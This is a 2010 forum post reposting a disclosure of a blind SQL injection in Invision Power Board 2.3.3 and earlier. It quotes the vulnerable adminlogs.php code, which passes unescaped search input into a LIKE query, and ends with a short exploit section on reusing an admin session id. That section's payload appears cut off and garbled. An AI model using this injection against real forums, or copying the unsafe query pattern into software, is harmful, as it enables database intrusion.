IPB <= 2.3.3 blind sql-injection

h7t_2002: --[DEVELOPER]--; Tổng số bài gửi : 67
Join date : 01/06/2009
Age : 33
Đến từ : /dev/null

by h7t_2002 Thu Jul 15, 2010 7:23 am

Code:: ------------- adminlogs.php ------------- BUG FOUND: perdimonokl aka 4nob1oz BUG FOUND DATE: 24/11/2007 /* * VULN FUNCTION * ---------------- * * function view() * * ---------------- * VULN CODE * * -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * else * { * $this->ipsclass->input['search_string'] = urldecode($this->ipsclass->input['search_string']); * * $dbq = "m.".$this->ipsclass->input['search_type']." LIKE '%".$this->ipsclass->input['search_string']."%'"; * * $row = $this->ipsclass->DB->build_and_exec_query( array( 'select' => 'COUNT(m.id) as count', 'from' => 'admin_logs m', 'where' => $dbq ) ); * * $row_count = $row['count']; * * $query = "&act=adminlog&code=view&search_type={$this->ipsclass->input['search_type']}&search_string=".urlencode($this->ipsclass->input['search_string']); * * $this->ipsclass->DB->cache_add_query( 'adminlogs_view_two', array( 'dbq' => $dbq, 'limit_a' => $start ) ); * $this->ipsclass->DB->cache_exec_query(); * } * * -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * */ EXPLOIT ------- adsess=85f93b41dd3244e5680f5085b28b56bf ---> When you login to admin panel you open admin session and you can see it in variable "adsess=" Replace the "adsess=" in url with your own [localhost]())))--